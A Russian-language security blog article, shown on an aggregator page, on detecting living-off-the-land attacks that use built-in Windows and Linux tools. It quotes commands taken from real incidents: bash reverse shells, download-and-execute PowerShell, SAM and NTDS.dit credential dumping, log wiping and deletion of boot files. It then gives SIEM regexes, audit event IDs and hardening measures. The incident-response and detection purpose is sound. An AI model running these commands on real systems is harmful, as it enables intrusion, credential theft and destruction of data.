惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Cyberwarzone
Cyberwarzone
Vercel News
Vercel News
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
aimingoo的专栏
aimingoo的专栏
B
Blog RSS Feed
A
About on SuperTechFans
T
The Blog of Author Tim Ferriss
爱范儿
爱范儿
腾讯CDC
S
SegmentFault 最新的问题
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
The Hacker News
The Hacker News
J
Java Code Geeks
大猫的无限游戏
大猫的无限游戏
B
Blog
IT之家
IT之家
Spread Privacy
Spread Privacy
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
C
Cisco Blogs
Recent Announcements
Recent Announcements
H
Hacker News: Front Page
AI
AI
I
InfoQ
H
Heimdal Security Blog
T
Threatpost
Cisco Talos Blog
Cisco Talos Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
I
Intezer
W
WeLiveSecurity
SecWiki News
SecWiki News
MongoDB | Blog
MongoDB | Blog
宝玉的分享
宝玉的分享
博客园 - 【当耐特】
云风的 BLOG
云风的 BLOG
T
Threat Research - Cisco Blogs
V2EX - 技术
V2EX - 技术
N
News and Events Feed by Topic
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
O
OpenAI News
阮一峰的网络日志
阮一峰的网络日志
T
Troy Hunt's Blog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 司徒正美
Apple Machine Learning Research
Apple Machine Learning Research
雷峰网
雷峰网
T
Tor Project blog
有赞技术团队
有赞技术团队
Schneier on Security
Schneier on Security
Last Week in AI
Last Week in AI

Все публикации подряд на Хабре

Ловим музу за клавиатуру: как айтишнику стать автором Что умеет Midjourney в 2026? Мой немного грустный разбор этого шикарного инструмента Никто не любит писать тесты, но ИИ может исправить это IPv8 выглядит как мечта. Поэтому почти наверняка не взлетит Производители вернули в продажу материнки с DDR3. Что происходит? Управление агентом с телефона через Telegram теперь в KodaCode От координации к лидерству: как меняется роль руководителя разработки Я сделала родителям бизнес вместо пенсии: зарабатываем 70 тысяч, мама не даёт продать В три раза быстрее приемка товара и оптимизация трудозатрат на 73%: как «РСТ-Инвент» помог Gulliver Group ИИ-шечный мир победил? О влиянии искусственного интеллекта на игропром Кремль снижает давление на Телеграмм пока Европа строит интернет по паспорту Как CEO, CTO и CIO за 8 часов собрали ИИ-директора, который умеет держать позицию под давлением Как (не) потерять домен за выходные Вместо 8 разных VPS: как я организовал практику студентам на одном сервере Почему твой Open Source проект не замечают? R&D: искусство управления неопределенностью в разработке AI-дефляция: вакансий для разработчиков больше, а рост зарплат — худший за 15 лет Мы отдали управление роботами OpenClaw. Что из этого вышло Галактический ID: система идентификации для всех форм разумной жизни Шесть основ бизнес-анализа: начинаем с вопроса «Кто в игре?» Код-ревью, в котором дело не в коде Данные переехали. Команда — нет Системной подход к сдаче OSWE в 2025 Почему комната управления реактором покрашена в цвет морской пены 4 YAML-файла вместо PySpark: как аналитикам строить пайплайны без разработчиков LLM-агент для поиска свободных доменов: автоматизируем подбор Когда, зачем и как правильно начинать новую сессию в Claude Code? Как я заставил нейросеть писать макросы для FreeCAD Анатомия ИИ‑агента для подбора персонала. От тысячи резюме к топ‑10 за минуты Опыт разработчика как экономика внимания Автономность как точка невозврата: кто будет субъектом в цифровом будущем Обучение ИИ в «диких» условиях: как рутинные действия превращаются в датасеты Как измерить LLM для задач кибербеза: обзор открытых бенчмарков Где хранить код? Сравнение GitHub, GitLab и Bitbucket Математика объясняет, почему нормальное распределение встречается повсюду Почему ваш FinOps не работает: 12 тезисов от практиков Как подписать проектную документацию УКЭП с использованием бесплатных лицензий Pilot Адаптивное администрирование Sigla Vision Я грузил уран в бочки, а потом 20 лет строил ИТ в атомной отрасли Чем позвонить с Эвереста? История и обзор спутниковой связи. Часть 2 Как языковая модель помогает контролировать качество инструктажей по охране труда в металлургии Как не передать на desktop свой IP в РКН Анатомия SAP Privileges: как устроено управление правами в macOS MoneyDev: Сказка про три главных слова Обновлённый токенизатор видео K-VAE 2.0 от Сбера Как сделать диспетчеризацию дома на 1284 квартиры почти бесплатно Как мы разогнали железную дорогу Мы дали агентам рутину. Теперь надо решить — что делать с освободившимся временем Токсичный контент, промпт-хакинг и защита ИИ — всё о Guardrails для LLM Умный город начинается с точного взгляда: как «Фалькон Тех» меняет пространство к лучшему Навайбкодил приложение для анализа графов Почему Дюну так интересно читать? Упрощаем работу с рутиной или как стать Гендальфом Белым Деконструкция Go: CPU, RAM и что там происходит. Go Assembler база. Часть 1.1 Какие профессии исчезнут из-за ИИ, а какие появятся? И что с этим делать Как мы построили IT-отдел, где хочется расти: архитектурные встречи, прозрачные метрики и книжные подарки Rufler: Делаем из Claude Code автономный рой через один YAML-конфиг Sing-box и белый список приложений Как построить надёжный обмен сообщениями в микросервисах: лучшие практики для enterprise OpenAI строит MLM-пирамиду, а McKinsey и Accenture помогают ей в этом Дом, который не построил Фишер (Часть 2) «Сверхзвуковой математик» против «Вдумчивого логиста»: битва алгоритмов 3D-упаковки Мультимодальные модели – грубый и дорогой инструмент Разговоры ничего не стоят. Код тоже Проверки физических лиц: с кого начнет ФНС Топ-10 бесплатных нейросетей для создания видео в 2026 году Первые слои кода: как наши решения сегодня определяют архитектуру ИИ на десятилетия Разработка нового статического анализатора: PVS-Studio JavaScript Поиск уязвимостей ПО: базовый минимум или роскошный максимум Почему оценка персонала не работает как инструмент управления Как мы разработали ИИ-ассистента и сократили рутину продуктовой команды на 50% Как я ушел из найма, нажарил косточек и продал на маркетплейсах на 168 млн в год Когда 1С:ERP уже внедрена, а нормального производственного плана всё ещё нет Как я сделал Claude мультимодальным, подключив к нему Qwen Omni Как приглашение на вакансию мечты превращается в атаку Infrastructure as Code: философия и лучшие практики IaC Тестируем Yandex Code Assistant на задаче, в которой нужно хранить секреты nxs-universal-chart v3.0: новое поколение универсального Helm-чарта Callback Injection: Техника, которая отправила Microsoft Defender в глухой нокаут «Все идеи на стол»: митап как способ вывести проект из тупика Сегодня я узнал нечто новое о GPU благодаря багу в своей игре Как заставить LLM ̶ ̶г̶а̶л̶л̶ю̶ ̶ эволюционировать Карта событий как фундамент аналитики: практический кейс для E-commerce Что выбрать для AI: x86, ARM или RISC-V? Дайджест железа за март Роль соматических мутаций в развитии аутоиммунных заболеваний: путь к избирательной терапии Mythos от Anthropic — тревожный сигнал для всех, а не только для банков Guardrails для LLM на Java: как приручить промпт‑инъекции и токсичные ответы Green-VLA: как мы собрали VLA-модель для реального антропоморфного робота и не потеряли обобщение Финансовая гонка вооружений: почему умные люди добровольно в ней участвуют Эра ИИ-агентов наступила: выбираем лучшего цифрового сотрудника # Практический опыт внедрения WinCC Redundancy на производственном предприятии Сделал MVP за 3 дня, а потом неделю прикручивал оплату. Оно того стоило? Физика против Маска: почему Starship V3 может оказаться ещё одной катастрофой Нефть Венесуэлы: крупнейшие запасы в мире, но не крупнейшая нефтяная держава JPA 4. Переосмысление Hibernate Почему зеркальная фотокамера Nikon D5 десятилетней давности идеально подошла для миссии «Артемида-2» Проект «Уровень-Спутник» или как мы сделали платформу для гидрологов «Замедлиться, чтобы ускориться»: почему ИИ повышает цену ошибок в требованиях и архитектуре Как с нуля поднять трафик IT-компании на 1657% при бюджете 55 тыс. и выжить Pixel-perfect Downsampling — идеальная отрисовка 50 миллионов точек без потерь
«Легитимное зло» в инфраструктуре: практический опыт детектирования LOLBAS
CSIRT (Инфос · 2026-05-07 · via Все публикации подряд на Хабре

Уровень сложностиСредний

Время на прочтение7 мин

Охват и читатели0

Кейс

Привет, Хабр! Меня зовут Максим Кишмерешкин, я ведущий аналитик центра мониторинга и реагирования «Инфосистемы Джет». Сегодня мы поговорим про довольно старую, но до сих пор остающуюся популярной тему — LOTL. Напомню, что LOTL (living on the land), или как я его называю «жизнь на подножном корме» — это использование в атаке инструментов, которые уже есть в системе жертвы. Мы поделимся тем, как мы этот класс атак встречали в реальных кейсах, какие процедуры и техники выявляли, и расскажем, как их можно детектировать.

Использование LOTL в атаках, в отличие от ВПО (как типового, так и разработанного под конкретную задачу), даёт злоумышленникам ряд неоспоримых преимуществ: отличительной особенностью я бы назвал отсутствие индикаторов компрометации при выявлении подобного рода атак, эти атаки все еще тяжело детектировать средствами EDR, антивирусов, а также очень часто эту активность можно спутать с легитимной административной деятельностью.

За последние два года мы видели следы использования LOTL на разных этапах атак во всех своих расследованиях.  Концепция LOTL популярна, развивается в lolol.farm и уже насчитывает около 28 отдельных проектов, которые полезны как атакующим для конструирования своих атак, так и защищающимся, чтобы писать детектирующие правила. Полезные проекты для защитников — это основные проекты LOLBAS (легитимные утилиты Windows и аргументы выполнения к ним, с помощью которых можно выполнять злонамеренные действия), GTFObins — аналог под linux, LOLtunnels, loldrivers.

Не только мы замечали, что злоумышленники используют LOLBAS в своих атаках. Например, публично известны следующие варианты атак с LOTL:

APT31 горизонтально перемещалась через WMI

wmic process call create malware.exe/<command> ,   

Goffee через mshta доставляли и выполняли полезную нагрузку

powershell.exe /C mshta.exe https://<domain>.com/<name>.hta

BO Team дампили базу ntds.dit используя ntdsutil.

ntdsutil "ac i ntds" ifm "create full nodefrag $appdata\AD" q q

Давайте на примерах реальных кейсов из наших расследований посмотрим, какими процедурами LOLBAS, GTFOBins пользовались злоумышленники.

Как это выглядит в реальных инцидентах

Абсолютно типичная сегодня ситуация для наших расследований:

В linux-системах была выявлена загрузка и исполнение вредоносного скрипта с C2-сервера с использованием стандартных системных утилит bash и curl:

bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1 bash -i >& /dev/tcp/xx.xx.xx.xx/53 0>&1 curl http://xx.xx.xx.xx/systemd -o /tmp/systemd

В другом примере, уже под Windows, злоумышленники закреплялись через процесс reg.exe при каждом старте системы, запуская свое ВПО zip.bat, del.bat вместе с запуском explorer.exe:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d explorer.exe,c:\tzxl2\zip.bat,c:\tzxl2\del.bat /f ()

Заметали следы с помощью утилиты wevtutil, очищая все события в журналах:

powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $; wevtutil cl $} - powershell logoff

Разведка в уже скомпрометированной системе выполнялась стандартными средствами:

whoami

quser

ping

dir

ipconfig /all

netstat -ano

systeminfo

hostname

nltest /trusted_domains

net user xx /domain

Отмечу, что без дополнительного контекста этап разведки мы бы не отличили от легитимных действий администраторов. В большинстве случаев в реальных атаках мы выходили на использование LOLBAS не сразу, а тогда, когда уже определили скомпрометированную УЗ / рабочую станцию и по артефактам находили команды от скомпрометированных пользователей.

Учетные данные злоумышленники вытаскивали либо через сохранение критичных веток реестра

C:\Windows\system32\cmd.exe" /c reg save hklm\sam C:\TEMP\1C\sam > C:\Users\XXXX\AppData\Local\Temp\v8_C1DE_b8.txt"

либо копировали кусок БД, хранящей учетные записи, группы и хеши паролей из теневой копии базы Active Directory командой

copy $ShadowCopyName\Windows\NTDS\NTDS.dit C:\ntds.dit.save

Более чем в 70% случаев основным инструментом у хакеров выступал Powershell.

С помощью него кроме разведки, запуска утилит реестра, также связывались с C2:

powershell.exe -nop -w hidden -e WwB... - [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$hN=new-object net.webclient

Загружали и на лету исполняли скрипт обхода средств антивирусной защиты.

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell IEX newwebclient downloadstring http://xxxxx.ru/E‼️ulVCVb/xxx.ps1

Были замечены и очень специфичные команды. Через robocopy удалялись критичные файлы загрузки и восстановления операционной системы. Это был этап подготовки перед запуском шифровальщика в инфраструктуре

reagentc /disable; Remove-Item -Path "C:\Recovery","C:\Windows\System32\Recovery","C:\bootmgr","C:\EFI","C:\Boot" -Recurse -Force -ErrorAction SilentlyContinue; *;Restart-Computer -Force

Как видим, использование LOLBAS ограничивается только фантазией атакующих. Охватывается огромный диапазон покрытия kill-chain по матрице MITRE, начиная от Initial Access и заканчивая Impact (выявлено упоминание в 11 из 14 тактик).

А что если реконструировать атаку, используя только LOLBAS?

Давайте попробуем.

Через фишинг злоумышленник доставляет приманку с вредоносным скриптом, запускает его через powershell и  mshta. Скрипт закрепляется в автозагрузке через реестр, мошенник обходит AppLocker через regsvr32.exe и проводит разведку стандартными утилитами whoami, ipconfig.

Далее он получает доступ к учетным данным, сначала сдампив lsass через rundll32 и comsvcs.dll, а потом через ntdsutil и весь ntds.dit. Горизонтально распространяться мошенник будет через WMI, с помощью того же powershell он соберет чувствительную информацию, выгрузит себе на управляющий сервер через certutil, и как итог всей атаки — зашифрует всю инфраструктуру с помощью Bitlocker.

Мы показали, как злоумышленники могут полностью скомпрометировать инфраструктуру, оставляя минимум следов в системе. Отмечу, что всю атаку можно выполнить в рамках одного powershell-скрипта.

А как обстоят дела с конструированием атаки в отечественных операционных системах? На них злоумышленник тоже может довольно незаметно и полностью скомпрометировать всю инфраструктуру. Давайте реконструируем с помощью проекта GTFObins:

Через фишинг доставляется приманка (например, «скрипт обновления»), пользователь скачивает его, запускает. Скрипт закрепляется через автозапуск (cron), затем, используя ошибку в конфигурации sudo, злоумышленник повышается через find, отключает историю команд bash_history, перемещается через ssh, через tar собирает чувствительную информацию и выгружает через nc. Далее он шифрует всю инфраструктуру через openssl.

Каждая команда по отдельности — легитимная. Но в совокупности они формируют полноценную атаку от initial access до impact.

Как заметить «легитимное зло» в инфраструктуре

Давайте посмотрим, как можно этому противостоять, детектировать и какие защитные меры помогут.

Выявляем факт использования инструментов LOLBAS через регулярные выражения в логике корреляционных правил SIEM. Детектирование направлено на различные вариации, начиная от скачивания вредоносного файла и вплоть до дампа критичных объектов операционной системы.

Пример — есть факт скачивания и загрузки файлов с удаленных ресурсов с ftp.

Чтобы это детектировать, выявляем аномалию, а именно — скачивание с внешнего контура по протоколу, который в повседневной деятельности если и используется, то только внутри компании. Далее через регулярные выражения мы будем выявлять факт обращения по маске IP-адреса и  загрузки какого-либо файла.

Пример: ftp://12.45.134.111:1337/upload/m1.exe

Как выявить: в аргументах командной строки запуска процессов по регулярному выражению .*(ftp|http|https|smb|nfs|dict):\/\/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*" выявляем аномальную активность выгрузки по различным протоколам с внешних ресурсов.

Другой случай — нам надо выявить факт сохранения критичных веток реестра, выгрузив которые злоумышленник сможет получить учетные данные пользователей.

Сама команда C:\Windows\system32\cmd.exe" /c reg save hklm\sam C:\TEMP\1C\sam > C:\Users\XXXX\AppData\Local\Temp\v8_C1DE_b8.txt"

Как выявить: включить расширенное логирование аудита выполнения команд Windows Event ID 4688, либо смотрим события Sysmon 1, в этих событиях смотрим запуск процесса reg.exe, в аргументах командной строки ищем команду save и пути к критичным веткам security/system/sam.

В целом логика детектирования будет сводиться к отслеживанию запуска штатных утилит операционной системы и аргументов запуска команд, в которых и будет выявлен подозрительный контекст.

Как противостоять?

Я выделю четыре основных направления, на которые стоит обратить внимание:

  1. Аудит выполнения команд

    • Настраиваем журналирование командной строки событий аргументами event id 4688, Sysmon Event 1, модулей, скрипт-блоков Powershell 4104, 4103, 600.
    • Настраиваем журналирование Auditd для Linux-систем.
    • В случае, если в инфраструктуре есть EDR, собираем с него телеметрию для последующего анализа.

  2. Детектирование

    • Используем SIEM/EDR-средства для написания собственной корреляционной логики или использования сигнатур «из коробки», которые смогут выявить аномалии в автоматическом режиме
    • Использование UEBA. Создание типичного рабочего профиля для каждого пользователя поможет выявить возможные аномалии использования легитимных инструментов. На мой взгляд, сейчас, к сожалению, этот класс решений не особо эффективен по причине огромного процента ложноположительных срабатываний при детектировании LOTL-атак.

  3. Харденинг инфраструктуры

    • Использование SELinux, AppArmor.
    • Application Control / Whitelisting — в статье от Microsoft приведены примеры, какие приложения можно исключить.
    • Для PowerShell — включение Constrained Language Mode и подпись скриптов.

  4. Базовые меры

    • Даже если злоумышленнику удалось выполнить какую-либо команду, необходимо постараться минимизировать шансы получить привилегированную учетную запись, для этого используем принцип минимальных привилегий.
    • Сегментируем сеть, чтобы минимизировать возможность горизонтально перемещаться по инфраструктуре.
    • В случае если по каким-либо признакам детектирующее правило не сработало (обфускация, доставка по частям) — выявить подозрительные трафик / эксфильтрацию поможет использование NTA.

Хочу отметить, что сами по себе легитимные инструменты не опасны, опасен контекст их выполнения. Этот класс атак останется популярным еще долго, злоумышленники будут стараться и дальше минимально оставлять следы своего присутствия, а защищающиеся — пытаться выявить аномалии при работе со штатными утилитами операционной системы.

Автор: Максим Кишмерешкин, ведущий аналитик центра мониторинга и реагирования, «Инфосистемы Джет»